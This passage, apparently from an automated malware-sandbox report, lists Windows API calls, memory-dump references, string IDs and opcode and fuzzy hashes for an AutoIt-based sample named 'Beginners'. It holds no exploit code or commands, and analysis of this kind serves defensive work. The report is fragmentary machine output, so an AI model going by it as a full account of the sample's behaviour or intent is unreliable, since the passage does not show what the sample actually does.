                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00109555
                                          • UnloadUserProfile.USERENV(?,?), ref: 00109561
                                          • CloseHandle.KERNEL32(?), ref: 0010956A
                                          • CloseHandle.KERNEL32(?), ref: 00109572
                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 0010957B
                                          • HeapFree.KERNEL32(00000000), ref: 00109582
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                          • String ID:
                                          • API String ID: 146765662-0
                                          • Opcode ID: 0607d96759530bea3262d400c132741cefa4ca730696323c6f2a66772244d45c
                                          • Instruction ID: cf8978f7c66ca52cc4508e1004bfe5585bc608d300326b0ccbd271877bdb39cd
                                          • Opcode Fuzzy Hash: 0607d96759530bea3262d400c132741cefa4ca730696323c6f2a66772244d45c
                                          • Instruction Fuzzy Hash: 38E0E53A004141BFDB021FE2EC0C95ABF39FF4EB22B104620F71581870CB32A4A0DB50
                                          APIs
                                          • VariantInit.OLEAUT32(?), ref: 00128CFD
                                          • CharUpperBuffW.USER32(?,?), ref: 00128E0C
                                          • VariantClear.OLEAUT32(?), ref: 00128F84
                                            • Part of subcall function 00117B1D: VariantInit.OLEAUT32(00000000), ref: 00117B5D
                                            • Part of subcall function 00117B1D: VariantCopy.OLEAUT32(00000000,?), ref: 00117B66
                                            • Part of subcall function 00117B1D: VariantClear.OLEAUT32(00000000), ref: 00117B72
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Variant$ClearInit$BuffCharCopyUpper
                                          • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                          • API String ID: 4237274167-1221869570
                                          • Opcode ID: dbb72609e58c4c4173612aeeb4e72843cb361a11de743fc32944ff0dc916cd5e
                                          • Instruction ID: 87e9108ad0eec4640e449719f61b27cfc4af31ecdf551318032df13ab991439b
                                          • Opcode Fuzzy Hash: dbb72609e58c4c4173612aeeb4e72843cb361a11de743fc32944ff0dc916cd5e
                                          • Instruction Fuzzy Hash: A5919D756083019FC704DF24D481D9ABBF5EF99314F14896EF88A8B3A2DB30E945CB52
                                          APIs
                                            • Part of subcall function 000C436A: _wcscpy.LIBCMT ref: 000C438D
                                          • _memset.LIBCMT ref: 0011332E
                                          • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0011335D
                                          • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00113410
                                          • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0011343E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: ItemMenu$Info$Default_memset_wcscpy
                                          • String ID: 0
                                          • API String ID: 4152858687-4108050209
                                          • Opcode ID: 39954df7b059cea4af03d598c600ed7232f512bafcf58723a06257d4aaff29c5
                                          • Instruction ID: fd9034d8923d7b54e8df3843d399d17f60e7b1e3dc3f8388d8fe8e1ad9e02b1b
                                          • Opcode Fuzzy Hash: 39954df7b059cea4af03d598c600ed7232f512bafcf58723a06257d4aaff29c5
                                          • Instruction Fuzzy Hash: CA51C4316083019BD71AAF28D8456EBBBE8AF45320F04453DF8A5D35E5DB70CE84CB56
                                          APIs
                                          • _memset.LIBCMT ref: 00112F67
                                          • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00112F83
                                          • DeleteMenu.USER32(?,00000007,00000000), ref: 00112FC9
                                          • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00177890,00000000), ref: 00113012
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Menu$Delete$InfoItem_memset
                                          • String ID: 0
                                          • API String ID: 1173514356-4108050209
                                          • Opcode ID: 9730f9ea9da15c2a5377e910d3e17c267c3e9d94e747f4f954ec72343328be7f
                                          • Instruction ID: c29765c3161a21795aa18a5a45e15c19e5d75e95622aeb7a152e74d90437c21f
                                          • Opcode Fuzzy Hash: 9730f9ea9da15c2a5377e910d3e17c267c3e9d94e747f4f954ec72343328be7f
                                          • Instruction Fuzzy Hash: A341D5312083419FD728DF24C884F9ABBE4EF89310F104A2EF565972D1D770EA85CB62
                                          APIs
                                            • Part of subcall function 000C1A36: _memmove.LIBCMT ref: 000C1A77
                                            • Part of subcall function 0010B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0010B7BD
                                          • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00109ACC
                                          • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00109ADF
                                          • SendMessageW.USER32(?,00000189,?,00000000), ref: 00109B0F
                                            • Part of subcall function 000C1821: _memmove.LIBCMT ref: 000C185B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: MessageSend$_memmove$ClassName
                                          • String ID: ComboBox$ListBox
                                          • API String ID: 365058703-1403004172
                                          • Opcode ID: f452c6407574ba390644967018d1bdfffb1f0e702c18cb6fde86b03777ea6145
                                          • Instruction ID: ff327714efe8c1019da8efe3aae17dcbaf9b1d17daa3e66bc51c4b654a4e835b
                                          • Opcode Fuzzy Hash: f452c6407574ba390644967018d1bdfffb1f0e702c18cb6fde86b03777ea6145
                                          • Instruction Fuzzy Hash: A0213772A01104BFDB14EBA0DC96DFFBB78DF46360F108119F8A5A72E3DB74490A8620
                                          APIs
                                            • Part of subcall function 000B2111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 000B214F
                                            • Part of subcall function 000B2111: GetStockObject.GDI32(00000011), ref: 000B2163
                                            • Part of subcall function 000B2111: SendMessageW.USER32(00000000,00000030,00000000), ref: 000B216D
                                          • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00136A86
                                          • LoadLibraryW.KERNEL32(?), ref: 00136A8D
                                          • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00136AA2
                                          • DestroyWindow.USER32(?), ref: 00136AAA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                          • String ID: SysAnimate32
                                          • API String ID: 4146253029-1011021900
                                          • Opcode ID: 8c96171963d7e206fa4e7546b08ee11ab748589b10c1b29a1d5852a0785fe14a
                                          • Instruction ID: 6b6db943ae70602dcdff4c117dbd0947de20184cdc3cd346894db5526302d4ba
                                          • Opcode Fuzzy Hash: 8c96171963d7e206fa4e7546b08ee11ab748589b10c1b29a1d5852a0785fe14a
                                          • Instruction Fuzzy Hash: EE216D75204205BFEF118F64DC81EBB77ADEB59364F10CA19FA51A31A0D371DC9197A0
                                          APIs
                                          • GetStdHandle.KERNEL32(0000000C), ref: 00117377
                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 001173AA
                                          • GetStdHandle.KERNEL32(0000000C), ref: 001173BC
                                          • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 001173F6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: CreateHandle$FilePipe
                                          • String ID: nul
                                          • API String ID: 4209266947-2873401336
                                          • Opcode ID: ac98b08d03eefa1b36b87cc5b4b4d092508ecc55d66560da80efb964f142ca33
                                          • Instruction ID: 92168df63e193c47f9d77170723df3b082697ce37c244c43096dcb517766580e
                                          • Opcode Fuzzy Hash: ac98b08d03eefa1b36b87cc5b4b4d092508ecc55d66560da80efb964f142ca33
                                          • Instruction Fuzzy Hash: B4217C74508206ABDB288F69DC45ADA7BB4BF55720F204A29FDA1D73E0D7B09890DB60
                                          APIs
                                          • GetStdHandle.KERNEL32(000000F6), ref: 00117444
                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00117476
                                          • GetStdHandle.KERNEL32(000000F6), ref: 00117487
                                          • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 001174C1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: CreateHandle$FilePipe
                                          • String ID: nul
                                          • API String ID: 4209266947-2873401336
                                          • Opcode ID: f3422e42a2992df62468ecf61771c69237f056196e502c87b8116b923dc1ad6f
                                          • Instruction ID: 36e9ff73c373221a563073076822f090c5f3999886394b90e617951243dcc8cb
                                          • Opcode Fuzzy Hash: f3422e42a2992df62468ecf61771c69237f056196e502c87b8116b923dc1ad6f
                                          • Instruction Fuzzy Hash: 4721B0356082069BDB289F699C44EDA7BB8AF55730F200A29F9A1D77D0DB7098D1CB50
                                          APIs
                                          • SetErrorMode.KERNEL32(00000001), ref: 0011B297
                                          • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0011B2EB
                                          • __swprintf.LIBCMT ref: 0011B304
                                          • SetErrorMode.KERNEL32(00000000,00000001,00000000,00140980), ref: 0011B342
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: ErrorMode$InformationVolume__swprintf
                                          • String ID: %lu
                                          • API String ID: 3164766367-685833217
                                          • Opcode ID: 744a2f821f608e437d12002b7667200f53b380a873f5a3ea4a198b3dc70946a3
                                          • Instruction ID: bef30466f2436fbafbaaa6ad8f94e7a21ec17c742bb241880c81a19e04d8401e
                                          • Opcode Fuzzy Hash: 744a2f821f608e437d12002b7667200f53b380a873f5a3ea4a198b3dc70946a3
                                          • Instruction Fuzzy Hash: A5213335A00209AFCB10DFA5CC85EEEB7B8EF89714B104069F905E7392DB71EA55CB61
                                          APIs
                                            • Part of subcall function 000C1821: _memmove.LIBCMT ref: 000C185B
                                            • Part of subcall function 0010AA52: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0010AA6F
                                            • Part of subcall function 0010AA52: GetWindowThreadProcessId.USER32(?,00000000), ref: 0010AA82
                                            • Part of subcall function 0010AA52: GetCurrentThreadId.KERNEL32 ref: 0010AA89
                                            • Part of subcall function 0010AA52: AttachThreadInput.USER32(00000000), ref: 0010AA90
                                          • GetFocus.USER32 ref: 0010AC2A
                                            • Part of subcall function 0010AA9B: GetParent.USER32(?), ref: 0010AAA9
                                          • GetClassNameW.USER32(?,?,00000100), ref: 0010AC73
                                          • EnumChildWindows.USER32(?,0010ACEB), ref: 0010AC9B
                                          • __swprintf.LIBCMT ref: 0010ACB5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                          • String ID: %s%d
                                          • API String ID: 1941087503-1110647743
                                          • Opcode ID: 9f8b74317936fd7b1cab0b721162f62e013028792bf1f2e91c27051c0eec6636
                                          • Instruction ID: 47a067c6d6dbb3ffcce19d4e677d9b7d8dc35c9d53021f552ab83509fae7d358
                                          • Opcode Fuzzy Hash: 9f8b74317936fd7b1cab0b721162f62e013028792bf1f2e91c27051c0eec6636
                                          • Instruction Fuzzy Hash: C8119D75600305ABDF11BFA0DE85FEA376CAF49710F004079BE89AA193DBB059499B72
                                          APIs
                                          • CharUpperBuffW.USER32(?,?), ref: 00112318
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: BuffCharUpper
                                          • String ID: APPEND$EXISTS$KEYS$REMOVE
                                          • API String ID: 3964851224-769500911
                                          • Opcode ID: c0acd790e7cb17321b5f4c41f5d982141f45e9cc8200e0811d3538750d6235f8
                                          • Instruction ID: d74075cc9ed85aec981b581fbbf0e1f2ede89636e1d009765f6cd8d71056e85d
                                          • Opcode Fuzzy Hash: c0acd790e7cb17321b5f4c41f5d982141f45e9cc8200e0811d3538750d6235f8
                                          • Instruction Fuzzy Hash: ED118E309102189FCF04EF94D9919EEB3B4FF2A304F10406AE824A7362EB325E56DF50
                                          APIs
                                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0012F2F0
                                          • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0012F320
                                          • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0012F453
                                          • CloseHandle.KERNEL32(?), ref: 0012F4D4
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                          • String ID:
                                          • API String ID: 2364364464-0
                                          • Opcode ID: 86025a34002306d791c15228b47d88ddbf8bf31ca2f0c6005460fcfe403a155e
                                          • Instruction ID: 46c53f8b0a74348f2738ccd6a084152685829792b0440f5ca43ce5491d7a36b8
                                          • Opcode Fuzzy Hash: 86025a34002306d791c15228b47d88ddbf8bf31ca2f0c6005460fcfe403a155e
                                          • Instruction Fuzzy Hash: 76819F716007109FD724EF28D886BAAB7E5AF48710F14882DF9999B2D3D7B0ED41CB91
                                          APIs
                                            • Part of subcall function 000C1A36: _memmove.LIBCMT ref: 000C1A77
                                            • Part of subcall function 0013147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0013040D,?,?), ref: 00131491
                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0013075D
                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0013079C
                                          • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 001307E3
                                          • RegCloseKey.ADVAPI32(?,?), ref: 0013080F
                                          • RegCloseKey.ADVAPI32(00000000), ref: 0013081C
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                          • String ID:
                                          • API String ID: 3440857362-0
                                          • Opcode ID: 1d14f35a566571b949d7c909d8e03a890ce0f791b34decbd872c8eb67ecee66b
                                          • Instruction ID: aa2a547c2ab3f1bc214739eebc527d88ae7feb0f97a62ce2399caefd7d109905
                                          • Opcode Fuzzy Hash: 1d14f35a566571b949d7c909d8e03a890ce0f791b34decbd872c8eb67ecee66b
                                          • Instruction Fuzzy Hash: C6516831208204AFC715EF64C891FAEB7E9FF89304F00892DF595872A2DB31E905CB92
                                          APIs
                                          • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0011EC62
                                          • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0011EC8B
                                          • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0011ECCA
                                            • Part of subcall function 000B4D37: __itow.LIBCMT ref: 000B4D62
                                            • Part of subcall function 000B4D37: __swprintf.LIBCMT ref: 000B4DAC
                                          • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0011ECEF
                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0011ECF7
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                          • String ID:
                                          • API String ID: 1389676194-0
                                          • Opcode ID: 903bb5fe72e4bacc92411dc419b04530c05a1fa6b73d6075871ea0834c5f1636
                                          • Instruction ID: 84c6fe9ca1ce6d3519eff03eca76d25e5294b460d7daf2b042f05efec08351dc
                                          • Opcode Fuzzy Hash: 903bb5fe72e4bacc92411dc419b04530c05a1fa6b73d6075871ea0834c5f1636
                                          • Instruction Fuzzy Hash: 3D512A35A00205DFCB05EFA4C985EADBBF5EF09310B148099E949AB3A2CB31AD51DB61
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5cbd4da05529848ac33db953f0b31f2fb6e8fba61b95b5339ff17bd7b9a5247f
                                          • Instruction ID: f047d81084e68f6b2fecf06022106e1f5fc704bb358f74e3faf7c28d560d0ab0
                                          • Opcode Fuzzy Hash: 5cbd4da05529848ac33db953f0b31f2fb6e8fba61b95b5339ff17bd7b9a5247f
                                          • Instruction Fuzzy Hash: 62412679904114AFD714CF28CCC8FA9BBB8EF0A350F950265F99AA72E1C7319D41DB51
                                          APIs
                                          • GetCursorPos.USER32(?), ref: 000B2727
                                          • ScreenToClient.USER32(001777B0,?), ref: 000B2744
                                          • GetAsyncKeyState.USER32(00000001), ref: 000B2769
                                          • GetAsyncKeyState.USER32(00000002), ref: 000B2777
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: AsyncState$ClientCursorScreen
                                          • String ID:
                                          • API String ID: 4210589936-0
                                          • Opcode ID: 91dc562d54bd8a5c481359d109223c40db8f282cc6cd2fd7df9e7a905dfbea88
                                          • Instruction ID: 1d260ba44b45e657587394e1efa4591293653cc9984b96bcfd0b9f086a5a19d5
                                          • Opcode Fuzzy Hash: 91dc562d54bd8a5c481359d109223c40db8f282cc6cd2fd7df9e7a905dfbea88
                                          • Instruction Fuzzy Hash: 05418375508109FFDF259F69C844EEDBBB4FB05324F10831AF825A6290CB319E91DB91
                                          APIs
                                          • GetWindowRect.USER32(?,?), ref: 001095E8
                                          • PostMessageW.USER32(?,00000201,00000001), ref: 00109692
                                          • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0010969A
                                          • PostMessageW.USER32(?,00000202,00000000), ref: 001096A8
                                          • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 001096B0
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
